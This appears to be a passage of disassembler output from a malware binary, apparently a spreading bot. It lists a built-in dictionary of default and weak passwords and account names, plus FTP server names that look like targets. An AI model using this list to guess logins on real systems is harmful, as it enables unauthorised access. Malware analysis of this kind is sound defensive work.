dd offset aDivxServer ; "DiVX-SERVER"
dd offset off_43DA58
dd offset aDell ; "Dell"
dd offset aCompaqblah ; "Compaqblah"
dd offset aMaster ; "master"
dd offset aMailserver ; "mailserver"
dd offset aAspnet ; "aspnet"
dd offset aAspnet69 ; "aspnet69"
dd offset a31337 ; "31337"
dd offset a01 ; "01"
dd offset a02 ; "02"
dd offset a03 ; "03"
dd offset a04 ; "04"
dd offset a05 ; "05"
dd offset aBox ; "box"
dd offset aBox1 ; "box1"
dd offset aBox2 ; "box2"
dd offset aBox3 ; "box3"
dd offset aBox4 ; "box4"
dd offset aBox5 ; "box5"
dd offset dword_43AB88
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxx_0 ; "xXx"
dd offset a@_3 ; "!@#$"
dd offset a@_2 ; "!@#$%"
dd offset a@_1 ; "!@#$%^"
dd offset a@_0 ; "!@#$%^&"
dd offset a@ ; "!@#$%^&*"
dd offset asc_43D8AC ; "%"
dd offset asc_43D8A8 ; "%%"
dd offset asc_43D8A4 ; "%%%"
dd offset asc_43D89C ; "%%%%"
dd offset asc_43D894 ; "%%%%%"
dd offset dword_43A30C
dd offset a00 ; "00"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a000000 ; "000000"
dd offset a00000000 ; "00000000"
dd offset a007 ; "007"
dd offset a0wn3d ; "0wn3d"
dd offset a0wned ; "0wned"
dd offset a1 ; "1"
dd offset a110 ; "110"
dd offset a111 ; "111"
dd offset a111 ; "111"
dd offset a111111 ; "111111"
dd offset a11111111 ; "11111111"
dd offset a11111111 ; "11111111"
dd offset a12 ; "12"
dd offset a121 ; "121"
dd offset a121212 ; "121212"
dd offset a123 ; "123"
dd offset a123123 ; "123123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a12346 ; "12346"
dd offset a123467 ; "123467"
dd offset a1234678 ; "1234678"
dd offset a12346789 ; "12346789"
dd offset a123467890 ; "123467890"
dd offset a1234qwer ; "1234qwer"
dd offset a123abc ; "123abc"
dd offset a123asd ; "123asd"
dd offset a123qwe ; "123qwe"
dd offset a54321 ; "54321"
dd offset a654321 ; "654321"
dd offset a88888888 ; "88888888"
dd offset a31337 ; "31337"
dd offset aPc01 ; "pc01"
dd offset aPc02 ; "pc02"
dd offset aPc03 ; "pc03"
dd offset aPc04 ; "pc04"
dd offset aPc05 ; "pc05"
dd offset aBoss ; "BOSS"
dd offset aAussie ; "aussie"
dd offset dword_43DAAC
dd offset off_43DAA8
dd offset aAaaa ; "AAAA"
dd offset aAsdf ; "asdf"
dd offset aAbcd ; "abcd"
dd offset off_43D750
dd offset aAbc123 ; "abc123"
dd offset aAbcd ; "abcd"
dd offset aAccount? ; "account?"
dd offset aAccounting ; "accounting"
dd offset aAnything ; "anything"
dd offset aApache ; "apache"
dd offset aBillGates ; "bill gates"
dd offset aBillgates ; "billgates"
dd offset aChange ; "change"
dd offset aChangethis ; "changethis"
dd offset aChangeme ; "changeme"
dd offset aChangeme_0 ; "changeme!"
dd offset aCustomer ; "customer"
dd offset aClient ; "Client"
dd offset aClient01 ; "Client01"
dd offset aClient02 ; "Client02"
dd offset aClient03 ; "Client03"
dd offset aClient04 ; "Client04"
dd offset aClient05 ; "Client05"
dd offset aClosed_0 ; "closed!"
dd offset aClosed ; "closed"
dd offset aDefaultpass ; "defaultpass"
dd offset aDaemon_0 ; "daemon"
dd offset aDatabase ; "database"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDave ; "dave"
dd offset aDead ; "dead"
dd offset aDesktop ; "desktop"
dd offset aDb1234 ; "db1234"
dd offset aDbpass ; "dbpass"
dd offset aDefault_1 ; "default"
dd offset aExploited ; "exploited"
dd offset off_43D680
dd offset aSmbpass ; "smbpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aE_0 ; "e"
dd offset dword_43D664
dd offset off_43D660
dd offset aEducation ; "education"
dd offset aFucked ; "fucked"
dd offset aFuckyou ; "fuckyou"
dd offset aGuess ; "guess"
dd offset aGuessme ; "guessme"
dd offset aGuest ; "guest"
dd offset aHacked ; "hacked"
dd offset aHax ; "hax"
dd offset aLetmein ; "letmein"
dd offset aL337 ; "l337"
dd offset aL33t ; "l33t"
dd offset aLinux ; "linux"
dd offset aUnix ; "Unix"
dd offset aLogin ; "login"
dd offset aLocal ; "LOCAL"
dd offset aLoginpass ; "loginpass"
dd offset aMyvnc ; "myvnc"
dd offset aMs_user ; "MS_USER"
dd offset aMicrosoft ; "microsoft"
dd offset aMachine ; "machine"
dd offset aMs ; "MS"
dd offset aMypass ; "mypass"
dd offset aMypass123 ; "mypass123"
dd offset aMypc ; "mypc"
dd offset aMypc123 ; "mypc123"
dd offset aM_3 ; "M$"
dd offset aMysql ; "mysql"
dd offset aMssql ; "mssql"
dd offset aMyvps ; "myvps"
dd offset aMypc ; "mypc"
dd offset aNull_1 ; "NULL"
dd offset aOwn ; "own"
dd offset aOwned ; "owned"
dd offset aOwner ; "owner"
dd offset aPass_1 ; "pass"
dd offset aPass123 ; "pass123"
dd offset aPass1234 ; "pass1234"
dd offset aPasswd ; "passwd"
dd offset aPassword ; "password"
dd offset aPassword_0 ; "PASSWORD"
dd offset aPassword_1 ; "Password"
dd offset aPassword1 ; "password1"
dd offset aPassword123 ; "password123"
dd offset aPw ; "pw"
dd offset aPw123 ; "pw123"
dd offset off_43D508
dd offset aQ ; "q"
dd offset aQaz ; "qaz"
dd offset off_43D504
dd offset aQwer ; "qwer"
dd offset aQwert ; "qwert"
dd offset aQwerty ; "qwerty"
dd offset aBlink182 ; "blink182"
dd offset aRdp ; "rdp"
dd offset aR00t ; "r00t"
dd offset aRemote ; "remote"
dd offset aRoot ; "root"
dd offset aRooted ; "rooted"
dd offset aTest ; "Test"
dd offset aTest123 ; "test123"
dd offset aTester ; "tester"
dd offset aTesting ; "testing"
dd offset aTrojan ; "trojan"
dd offset aUser1 ; "user1"
dd offset aUsermane ; "usermane"
dd offset aUsername ; "username"
dd offset aUserpass ; "userpass"
dd offset aSa ; "sa"
dd offset aSchool ; "school"
dd offset aSecurity ; "security"
dd offset aSupport ; "support"
dd offset aSysadmin ; "sysadmin"
dd offset aSecret ; "secret"
dd offset aSecrets ; "secrets"
dd offset aSlave ; "slave"
dd offset aStudents ; "students"
dd offset aServidor ; "Servidor"
dd offset aServeur_0 ; "Serveur"
dd offset aServer ; "Server"
dd offset aSql ; "sql"
dd offset aSqlpass ; "sqlpass"
dd offset off_43D40C
dd offset off_43D970
dd offset aVirus ; "virus"
dd offset dword_43D400
dd offset off_43D3FC
dd offset aWin2kpro ; "Win2KPro"
dd offset aWindose ; "windose"
dd offset aWindows ; "windows"
dd offset aWindows2k ; "windows2k"
dd offset aWindows95 ; "windows95"
dd offset aWindows98 ; "windows98"
dd offset aWindowsme ; "windowsME"
dd offset aWindowsxp ; "WindowsXP"
dd offset aWindoze ; "windoze"
dd offset aWindoze2k ; "windoze2k"
dd offset aWindoze95 ; "windoze95"
dd offset aWindoze98 ; "windoze98"
dd offset aWindozeme ; "windozeME"
dd offset aWindozexp ; "windozexp"
dd offset aWine ; "wine"
dd offset aWing ; "wing"
dd offset aWinnt ; "winnt"
dd offset aWinpass ; "winpass"
dd offset aWinston ; "winston"
dd offset aWinxp ; "winxp"
dd offset aWired ; "wired"
dd offset aWin ; "win"
dd offset aWinxp ; "winxp"
dd offset aWin2k ; "win2k"
dd offset aWindows ; "windows"
dd offset aWww ; "www"
dd offset dword_43AB88
dd offset aY ; "y"
dd offset aXp_0 ; "xp"
dd offset aXx ; "xx"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aXxxxxx ; "xxxxxx"
dd offset aXxxxxxx ; "xxxxxxx"
dd offset aXxxxxxxx ; "xxxxxxxx"
dd offset aXxxxxxxxx ; "xxxxxxxxx"
dd offset aXyz ; "xyz"
dd offset aXyzzy ; "xyzzy"
dd offset aYouwontguessme ; "youwontguessme"
dd offset aYxcv ; "yxcv"
dd offset dword_43D2C4
dd offset off_43D2C0
dd offset aZxcv ; "zxcv"
align 8
aZxcv db 'zxcv',0 ; DATA XREF: .text:0043D2B0�o
align 10h
off_43D2C0 dd offset word_63787A ; DATA XREF: .text:0043D2AC�o
dword_43D2C4 dd 70617Ah aYxcv db 'yxcv',0 ; DATA XREF: .text:0043D2A4�o
align 10h
aYouwontguessme db 'youwontguessme',0 ; DATA XREF: .text:0043D2A0�o
align 10h
aXyzzy db 'xyzzy',0 ; DATA XREF: .text:0043D29C�o
align 4
aXyz db 'xyz',0 ; DATA XREF: .text:0043D298�o
aXxxxxxxxx db 'xxxxxxxxx',0 ; DATA XREF: .text:0043D294�o
align 4
aXxxxxxxx db 'xxxxxxxx',0 ; DATA XREF: .text:0043D290�o
align 4
aXxxxxxx db 'xxxxxxx',0 ; DATA XREF: .text:0043D28C�o
aXxxxx db 'xxxxx',0 ; DATA XREF: .text:0043D284�o
align 4
aXx db 'xx',0 ; DATA XREF: .text:0043D278�o
align 4
aXp_0 db 'xp',0 ; DATA XREF: sub_40A9FE+8D06�o
; sub_40A9FE+8E80�o ...
align 4
aWin2k db 'win2k',0 ; DATA XREF: .text:0043D260�o
align 4
aWin db 'win',0 ; DATA XREF: .text:0043D258�o
aWired db 'wired',0 ; DATA XREF: .text:0043D254�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .text:0043D250�o
; .text:0043D25C�o
align 4
aWinston db 'winston',0 ; DATA XREF: .text:0043D24C�o
aWinpass db 'winpass',0 ; DATA XREF: .text:0043D248�o
aWinnt db 'winnt',0 ; DATA XREF: .text:0043D244�o
align 10h
aWing db 'wing',0 ; DATA XREF: .text:0043D240�o
align 4
aWine db 'wine',0 ; DATA XREF: .text:0043D23C�o
align 10h
aWindozexp db 'windozexp',0 ; DATA XREF: .text:0043D238�o
align 4
aWindozeme db 'windozeME',0 ; DATA XREF: .text:0043D234�o
align 4
aWindoze98 db 'windoze98',0 ; DATA XREF: .text:0043D230�o
align 4
aWindoze95 db 'windoze95',0 ; DATA XREF: .text:0043D22C�o
align 10h
aWindoze2k db 'windoze2k',0 ; DATA XREF: .text:0043D228�o
align 4
aWindoze db 'windoze',0 ; DATA XREF: .text:0043D224�o
aWindowsxp db 'WindowsXP',0 ; DATA XREF: .text:0043D220�o
align 10h
aWindowsme db 'windowsME',0 ; DATA XREF: .text:0043D21C�o
align 4
aWindows98 db 'windows98',0 ; DATA XREF: .text:0043D218�o
align 4
aWindows95 db 'windows95',0 ; DATA XREF: .text:0043D214�o
align 4
aWindows2k db 'windows2k',0 ; DATA XREF: .text:0043D210�o
align 10h
aWindows db 'windows',0 ; DATA XREF: .text:0043D20C�o
; .text:0043D264�o
aWindose db 'windose',0 ; DATA XREF: .text:0043D208�o
aWin2kpro db 'Win2KPro',0 ; DATA XREF: .text:0043D204�o
align 4
off_43D3FC dd offset word_636E66 ; DATA XREF: .text:0043D200�o
dword_43D400 dd 737076h aVirus db 'virus',0 ; DATA XREF: .text:0043D1F8�o
align 4
off_43D40C dd offset loc_415353+2 ; DATA XREF: .text:0043D1F0�o
aSqlpass db 'sqlpass',0 ; DATA XREF: .text:0043D1EC�o
aSql db 'sql',0 ; DATA XREF: .text:0043D1E8�o
aServeur_0 db 'Serveur',0 ; DATA XREF: .text:0043D1E0�o
aStudents db 'students',0 ; DATA XREF: .text:0043D1D8�o
align 10h
aSlave db 'slave',0 ; DATA XREF: .text:0043D1D4�o
align 4
aSecrets db 'secrets',0 ; DATA XREF: .text:0043D1D0�o
aSecret db 'secret',0 ; DATA XREF: .text:0043D1CC�o
align 4
aSysadmin db 'sysadmin',0 ; DATA XREF: .text:0043D1C8�o
align 4
aSupport db 'support',0 ; DATA XREF: .text:0043D1C4�o
aSecurity db 'security',0 ; DATA XREF: sub_40A9FE+BB2�o
; sub_41EBE9+1F�o ...
align 4
aSchool db 'school',0 ; DATA XREF: .text:0043D1BC�o
align 10h
aSa db 'sa',0 ; DATA XREF: .text:0043D1B8�o
align 4
aUserpass db 'userpass',0 ; DATA XREF: .text:0043D1B4�o
align 10h
aUsername db 'username',0 ; DATA XREF: .text:0043D1B0�o
align 4
aUsermane db 'usermane',0 ; DATA XREF: .text:0043D1AC�o
align 4
aUser1 db 'user1',0 ; DATA XREF: .text:0043D1A8�o
align 10h
aTrojan db 'trojan',0 ; DATA XREF: .text:0043D1A4�o
align 4
aTesting db 'testing',0 ; DATA XREF: .text:0043D1A0�o
aTester db 'tester',0 ; DATA XREF: .text:0043D19C�o
align 4
aTest123 db 'test123',0 ; DATA XREF: .text:0043D198�o
aTest db 'Test',0 ; DATA XREF: .text:0043D194�o
align 4
aRooted db 'rooted',0 ; DATA XREF: .text:0043D190�o
align 10h
aRemote db 'remote',0 ; DATA XREF: .text:0043D188�o
align 4
aR00t db 'r00t',0 ; DATA XREF: .text:0043D184�o
align 10h
aBlink182 db 'blink182',0 ; DATA XREF: .text:0043D17C�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .text:0043D178�o
; .text:0043EE28�o
align 4
aQwert db 'qwert',0 ; DATA XREF: .text:0043D174�o
align 4
aQwer db 'qwer',0 ; DATA XREF: .text:0043D170�o
align 4
off_43D504 dd offset byte_657771 ; DATA XREF: .text:0043D16C�o
off_43D508 dd offset dword_647770 ; DATA XREF: .text:0043D160�o
aPw123 db 'pw123',0 ; DATA XREF: .text:0043D15C�o
align 4
aPw db 'pw',0 ; DATA XREF: .text:0043D158�o
align 4
aPassword123 db 'password123',0 ; DATA XREF: .text:0043D154�o
aPassword1 db 'password1',0 ; DATA XREF: .text:0043D150�o
align 10h
aPassword_1 db 'Password',0 ; DATA XREF: .text:0043D14C�o
align 4
aPassword_0 db 'PASSWORD',0 ; DATA XREF: .text:0043D148�o
align 4
aPassword db 'password',0 ; DATA XREF: .text:0043D144�o
; .text:0043EE04�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .text:0043D140�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .text:0043D13C�o
align 4
aPass123 db 'pass123',0 ; DATA XREF: .text:0043D138�o
aPass_1 db 'pass',0 ; DATA XREF: .text:0043D134�o
; .text:0043EE20�o
align 4
aOwned db 'owned',0 ; DATA XREF: .text:0043D12C�o
align 10h
aOwn db 'own',0 ; DATA XREF: .text:0043D128�o
aNull_1 db 'NULL',0 ; DATA XREF: .text:0043D124�o
align 4
aMyvps db 'myvps',0 ; DATA XREF: .text:0043D11C�o
align 4
aMssql db 'mssql',0 ; DATA XREF: .text:0043D118�o
align 4
aMysql db 'mysql',0 ; DATA XREF: .text:0043D114�o
align 4
aM_3 db 'M$',0 ; DATA XREF: sub_40541D+138�o
; .text:0043D110�o
align 4
aMypc123 db 'mypc123',0 ; DATA XREF: .text:0043D10C�o
aMypc db 'mypc',0 ; DATA XREF: .text:0043D108�o
; .text:0043D120�o
align 4
aMypass123 db 'mypass123',0 ; DATA XREF: .text:0043D104�o
align 4
aMypass db 'mypass',0 ; DATA XREF: .text:0043D100�o
align 4
aMs db 'MS',0 ; DATA XREF: .text:0043D0FC�o
align 10h
aMachine db 'machine',0 ; DATA XREF: .text:0043D0F8�o
aMicrosoft db 'microsoft',0 ; DATA XREF: .text:0043D0F4�o
align 4
aMyvnc db 'myvnc',0 ; DATA XREF: .text:0043D0EC�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .text:0043D0E8�o
align 4
aLocal db 'LOCAL',0 ; DATA XREF: .text:0043D0E4�o
align 10h
aLogin db 'login',0 ; DATA XREF: .text:0043D0E0�o
align 4
aUnix db 'Unix',0 ; DATA XREF: .text:0043D0DC�o
align 10h
aL33t db 'l33t',0 ; DATA XREF: .text:0043D0D4�o
align 4
aL337 db 'l337',0 ; DATA XREF: .text:0043D0D0�o
align 10h
aLetmein db 'letmein',0 ; DATA XREF: .text:0043D0CC�o
; .text:0043EDF4�o
aHax db 'hax',0 ; DATA XREF: .text:0043D0C8�o
aHacked db 'hacked',0 ; DATA XREF: .text:0043D0C4�o
align 4
aGuessme db 'guessme',0 ; DATA XREF: .text:0043D0BC�o
aGuess db 'guess',0 ; DATA XREF: .text:0043D0B8�o
align 4
aFuckyou db 'fuckyou',0 ; DATA XREF: .text:0043D0B4�o
aFucked db 'fucked',0 ; DATA XREF: .text:0043D0B0�o
align 4
aEducation db 'education',0 ; DATA XREF: .text:0043D0AC�o
align 10h
off_43D660 dd offset byte_554445 ; DATA XREF: .text:0043D0A8�o
dword_43D664 dd 2Ah ; sub_40A9FE+121A�o ...
aDomainpassword db 'domainpassword',0 ; DATA XREF: .text:0043D09C�o
align 4
aSmbpass db 'smbpass',0 ; DATA XREF: .text:0043D098�o
off_43D680 dd offset byte_626D73 ; DATA XREF: .text:0043D094�o
aDbpass db 'dbpass',0 ; DATA XREF: .text:0043D088�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .text:0043D084�o
align 4
aDesktop db 'desktop',0 ; DATA XREF: .text:0043D080�o
aDead db 'dead',0 ; DATA XREF: .text:0043D07C�o
align 4
aDave db 'dave',0 ; DATA XREF: .text:0043D078�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .text:0043D074�o
align 10h
aDatabase db 'database',0 ; DATA XREF: .text:0043D070�o
align 4
aDaemon_0 db 'daemon',0 ; DATA XREF: .text:0043D06C�o
align 4
aDefaultpass db 'defaultpass',0 ; DATA XREF: .text:0043D068�o
aClosed db 'closed',0 ; DATA XREF: .text:0043D064�o
align 4
aClosed_0 db 'closed!',0 ; DATA XREF: .text:0043D060�o
aCustomer db 'customer',0 ; DATA XREF: .text:0043D044�o
align 4
aChangeme_0 db 'changeme!',0 ; DATA XREF: .text:0043D040�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .text:0043D03C�o
align 4
aChangethis db 'changethis',0 ; DATA XREF: .text:0043D038�o
align 10h
aChange db 'change',0 ; DATA XREF: .text:0043D034�o
align 4
aApache db 'apache',0 ; DATA XREF: .text:0043D028�o
align 10h
aAnything db 'anything',0 ; DATA XREF: .text:0043D024�o
align 4
aAccount? db 'account?',0 ; DATA XREF: .text:0043D01C�o
align 4
aAbc123 db 'abc123',0 ; DATA XREF: .text:0043D014�o
; .text:0043EE34�o
align 10h
off_43D750 dd offset byte_636261 ; DATA XREF: .text:0043D010�o
aAbcd db 'abcd',0 ; DATA XREF: .text:0043D00C�o
; .text:0043D018�o
align 4
aAsdf db 'asdf',0 ; DATA XREF: .text:0043D008�o
align 4
aAaaa db 'AAAA',0 ; DATA XREF: .text:0043D004�o
align 4
aAussie db 'aussie',0 ; DATA XREF: .text:0043CFF8�o
align 4
a88888888 db '88888888',0 ; DATA XREF: .text:0043CFD8�o
align 10h
a654321 db '654321',0 ; DATA XREF: .text:0043CFD4�o
; .text:0043EE30�o
align 4
a54321 db '54321',0 ; DATA XREF: .text:0043CFD0�o
align 10h
a123qwe db '123qwe',0 ; DATA XREF: .text:0043CFCC�o
align 4
a123asd db '123asd',0 ; DATA XREF: .text:0043CFC8�o
align 10h
a123abc db '123abc',0 ; DATA XREF: .text:0043CFC4�o
align 4
a1234qwer db '1234qwer',0 ; DATA XREF: .text:0043CFC0�o
align 4
a123467890 db '123467890',0 ; DATA XREF: .text:0043CFBC�o
align 10h
a12346789 db '12346789',0 ; DATA XREF: .text:0043CFB8�o
align 4
a1234678 db '1234678',0 ; DATA XREF: .text:0043CFB4�o
a123467 db '123467',0 ; DATA XREF: .text:0043CFB0�o
align 4
a12346 db '12346',0 ; DATA XREF: .text:0043CFAC�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .text:0043CFA8�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: .text:0043CFA4�o
; .text:0043EE2C�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:0043CFA0�o
; .text:0043EE00�o
a123456 db '123456',0 ; DATA XREF: .text:0043CF9C�o
; .text:0043EE0C�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:0043CF98�o
; .text:0043EE08�o
align 4
a1234 db '1234',0 ; DATA XREF: .text:0043CF94�o
; .text:0043EDF0�o
align 4
a123123 db '123123',0 ; DATA XREF: .text:0043CF90�o
align 4
a123 db '123',0 ; DATA XREF: .text:0043CF8C�o
; .text:0043EDEC�o
a121212 db '121212',0 ; DATA XREF: .text:0043CF88�o
align 10h
a121 db '121',0 ; DATA XREF: .text:0043CF84�o
a12 db '12',0 ; DATA XREF: .text:0043CF80�o
align 4
a11111111 db '11111111',0 ; DATA XREF: .text:0043CF78�o
; .text:0043CF7C�o
align 4
a111111 db '111111',0 ; DATA XREF: .text:0043CF74�o
align 4
a111 db '111',0 ; DATA XREF: .text:0043CF6C�o
; .text:0043CF70�o
a110 db '110',0 ; DATA XREF: .text:0043CF68�o
a0wned db '0wned',0 ; DATA XREF: .text:0043CF60�o
align 4
a0wn3d db '0wn3d',0 ; DATA XREF: .text:0043CF5C�o
align 4
a007 db '007',0 ; DATA XREF: .text:0043CF58�o
a00000000 db '00000000',0 ; DATA XREF: .text:0043CF54�o
align 4
a000000 db '000000',0 ; DATA XREF: .text:0043CF50�o
align 4
a00000 db '00000',0 ; DATA XREF: .text:0043CF4C�o
align 4
a0000 db '0000',0 ; DATA XREF: .text:0043CF48�o
align 4
a000 db '000',0 ; DATA XREF: .text:0043CF44�o
a00 db '00',0 ; DATA XREF: .text:0043CF40�o
align 4
asc_43D894 db '%%%%%',0 ; DATA XREF: .text:0043CF38�o
align 4
asc_43D89C db '%%%%',0 ; DATA XREF: .text:0043CF34�o
align 4
asc_43D8A4 db '%%%',0 ; DATA XREF: .text:0043CF30�o
asc_43D8A8 db '%%',0 ; DATA XREF: .text:0043CF2C�o
align 4
asc_43D8AC: ; DATA XREF: .text:0043CF28�o
unicode 0, <%>,0
a@ db '!@#$%^&*',0 ; DATA XREF: .text:0043CF24�o
align 4
aXxx_0 db 'xXx',0 ; DATA XREF: .text:0043CF10�o
aXxxx db 'xxxx',0 ; DATA XREF: .text:0043CF0C�o
; .text:0043D280�o
align 4
aXxx db 'xxx',0 ; DATA XREF: .text:0043CF08�o
; .text:0043D27C�o
aAspnet69 db 'aspnet69',0 ; DATA XREF: .text:0043CED0�o
align 4
aAspnet db 'aspnet',0 ; DATA XREF: .text:0043CECC�o
align 10h
aMailserver db 'mailserver',0 ; DATA XREF: .text:0043CEC8�o
align 4
aCompaqblah db 'Compaqblah',0 ; DATA XREF: .text:0043CEC0�o
align 4
aHallintovirk_0 db 'hallintovirkailijat',0 ; DATA XREF: .text:0043CE60�o
aAdministrato_0 db 'administrator',0 ; DATA XREF: .text:0043CE44�o
align 4
aAccess db 'Access',0 ; DATA XREF: .text:0043CE40�o
align 4
aAdmin123 db 'admin123',0 ; DATA XREF: .text:0043CE3C�o
align 10h
aAdmin_1 db 'admin',0 ; DATA XREF: .text:0043CE38�o
; .text:0043EDF8�o
align 4
asc_43D938: ; DATA XREF: .text:0041A188�o
; sub_424B0B+1C5�o ...
unicode 0, < >,0
aY: ; DATA XREF: .text:0043CDF8�o
; .text:0043D270�o ...
unicode 0, <y>,0
asc_43D940: ; DATA XREF: .text:0043CDF4�o
; .text:0044F3D4�o ...
unicode 0, <X>,0
aWebserver db 'webserver',0 ; DATA XREF: .text:0043CDF0�o
align 10h
aWww db 'www',0 ; DATA XREF: .text:0043CDEC�o
; .text:0043D268�o
dword_43D954 dd 6C6C754Bh, 63FD6E61h, 0FDhaFormationplus db 'FormationPLUS',0 ; DATA XREF: .text:0043CDE4�o
align 10h
off_43D970 dd offset word_636E76 ; DATA XREF: .text:0043CDE0�o
; .text:0043D1F4�o ...
aBoss db 'BOSS',0 ; DATA XREF: .text:0043CDDC�o
; .text:0043CEAC�o ...
align 4
aPc05 db 'pc05',0 ; DATA XREF: .text:0043CDD8�o
; .text:0043CFF0�o
align 4
aPc04 db 'pc04',0 ; DATA XREF: .text:0043CDD4�o
; .text:0043CFEC�o
align 4
aPc03 db 'pc03',0 ; DATA XREF: .text:0043CDD0�o
; .text:0043CFE8�o
align 4
aPc02 db 'pc02',0 ; DATA XREF: .text:0043CDCC�o
; .text:0043CFE4�o
align 4
aPc01 db 'pc01',0 ; DATA XREF: .text:0043CDC8�o
; .text:0043CFE0�o
align 4
aProfessional db 'Professional',0 ; DATA XREF: .text:0043CDC4�o
align 4
aServUFtp db 'Serv-U FTP',0 ; DATA XREF: .text:0043CDC0�o
align 10h
aServU db 'serv-u',0 ; DATA XREF: .text:0043CDBC�o
align 4
aSlimftp db 'slimftp',0 ; DATA XREF: .text:0043CDB8�o
aLighthttpd db 'lightHTTPD',0 ; DATA XREF: .text:0043CDB4�o
align 4
aWarftpd db 'warftpd',0 ; DATA XREF: .text:0043CDB0�o
aFtpd db 'ftpd',0 ; DATA XREF: .text:0043CDAC�o
align 4
aProftpd db 'proftpd',0 ; DATA XREF: .text:0043CDA8�o
aAccounting db 'accounting',0 ; DATA XREF: .text:0043CDA4�o
; .text:0043D020�o
align 10h
aAccount db 'account',0 ; DATA XREF: .text:0043CDA0�o
aAccess_0 db 'access',0
align 10h
aServeurFtp db 'serveur ftp',0
aMichelle db 'michelle',0
align 4
aMyftp db 'myftp',0
align 10h
aMybox db 'mybox',0
align 4
aMsumer db 'msumer',0
align 10h
aCompaqsecret db 'Compaqsecret',0
align 10h
aDell db 'Dell',0 ; DATA XREF: .text:0043CEBC�o
align 4
off_43DA58 dd offset byte_4D4249 ; DATA XREF: .text:0043CEB8�o
aAcer db 'Acer',0
align 4
aM_4 db 'm$',0
align 4
dd offset loc_435048+1
dd offset loc_424D53
aMs_user db 'MS_USER',0 ; DATA XREF: .text:0043D0F0�o
aSmbuser db 'SMBUSER',0
aFv db 'fv',0
align 4
aBillgates db 'billgates',0 ; DATA XREF: .text:0043D030�o
align 10h
aUsers db 'users',0
align 4
aQaz db 'qaz',0 ; DATA XREF: .text:0043D168�o
a1: ; DATA XREF: .text:0043CF64�o
unicode 0, <1>,0
aQ: ; DATA XREF: .text:0043D164�o
; .text:off_44F320�o ...
unicode 0, <q>,0
aE_0: ; DATA XREF: .text:0043D0A0�o
; .text:0044F328�o ...
unicode 0, <e>,0
off_43DAA8 dd offset byte_616161 ; DATA XREF: .text:0043D000�o
dword_43DAAC dd 61h ; .text:0043CFFC�o ...
aLinux db 'linux',0 ; DATA XREF: .text:0043D0D8�o
align 4
aUnix_0 db 'unix',0
align 10h
a@_0 db '!@#$%^&',0 ; DATA XREF: .text:0043CF20�o
a@_1 db '!@#$%^',0 ; DATA XREF: .text:0043CF1C�o
align 10h
a@_2 db '!@#$%',0 ; DATA XREF: .text:0043CF18�o
align 4
a@_3 db '!@#$',0 ; DATA XREF: .text:0043CD24�o
; .text:0043CF14�o
align 10h
a@_4 db '!@#',0 ; DATA XREF: .text:0043CD20�o
a@_5 db '!@',0 ; DATA XREF: .text:0043CD1C�o
align 4
a31337 db '31337',0 ; DATA XREF: .text:0043CD18�o
; .text:0043CED4�o ...
align 10h
aGuest db 'guest',0 ; DATA XREF: .text:0043CD14�o
; .text:0043D0C0�o
align 4
aBox5 db 'box5',0 ; DATA XREF: .text:0043CD10�o
; .text:0043CF00�o
align 10h
aBox4 db 'box4',0 ; DATA XREF: .text:0043CD0C�o
; .text:0043CEFC�o
align 4
aBox3 db 'box3',0 ; DATA XREF: .text:0043CD08�o
; .text:0043CEF8�o
align 10h
aBox2 db 'box2',0 ; DATA XREF: .text:0043CD04�o
; .text:0043CEF4�o
align 4
aBox1 db 'box1',0 ; DATA XREF: .text:0043CD00�o
; .text:0043CEF0�o
align 10h
aBox db 'box',0 ; DATA XREF: .text:0043CCFC�o
; .text:0043CEEC�o
aSudo db 'sudo',0 ; DATA XREF: .text:0043CCF8�o
; .text:0043CEA4�o
align 4
aGameserver db 'gameserver',0 ; DATA XREF: .text:0043CCF4�o
align 4
aGameServer db 'game server',0 ; DATA XREF: .text:0043CCF0�o
off_43DB44 dd offset dword_4F2D48 ; DATA XREF: .text:0043CCEC�o
dword_43DB48 dd 5244h aExploited db 'exploited',0 ; DATA XREF: .text:0043CCE4�o
; .text:0043D090�o
align 4
aDivxServer db 'DiVX-SERVER',0 ; DATA XREF: .text:0043CCE0�o
; .text:0043CEB4�o
aDivx db 'DiVX',0 ; DATA XREF: .text:0043CCDC�o
; .text:0043CEB0�o
align 4
aBillGates db 'bill gates',0 ; DATA XREF: .text:0043CCD8�o
; .text:0043D02C�o
align 4
aClient05 db 'Client05',0 ; DATA XREF: .text:0043CCD4�o
; .text:0043D05C�o
align 4
aClient04 db 'Client04',0 ; DATA XREF: .text:0043CCD0�o
; .text:0043D058�o
align 10h
aClient03 db 'Client03',0 ; DATA XREF: .text:0043CCCC�o
; .text:0043D054�o
align 4
aClient02 db 'Client02',0 ; DATA XREF: .text:0043CCC8�o
; .text:0043D050�o
align 4
aClient01 db 'Client01',0 ; DATA XREF: .text:0043CCC4�o
; .text:0043D04C�o
align 4
aClient db 'Client',0 ; DATA XREF: .text:0043CCC0�o
; .text:0043D048�o
align 4
aBlah db 'blah',0 ; DATA XREF: .text:0043CCBC�o
align 4
a05 db '05',0 ; DATA XREF: .text:0043CCB8�o
; .text:0043CEE8�o
align 4
a04 db '04',0 ; DATA XREF: .text:0043CCB4�o
; .text:0043CEE4�o
align 4
a03 db '03',0 ; DATA XREF: .text:0043CCB0�o
; .text:0043CEE0�o
align 10h
a02 db '02',0 ; DATA XREF: .text:0043CCAC�o
; .text:0043CEDC�o
align 4
a01 db '01',0 ; DATA XREF: .text:0043CCA8�o
; .text:0043CED8�o
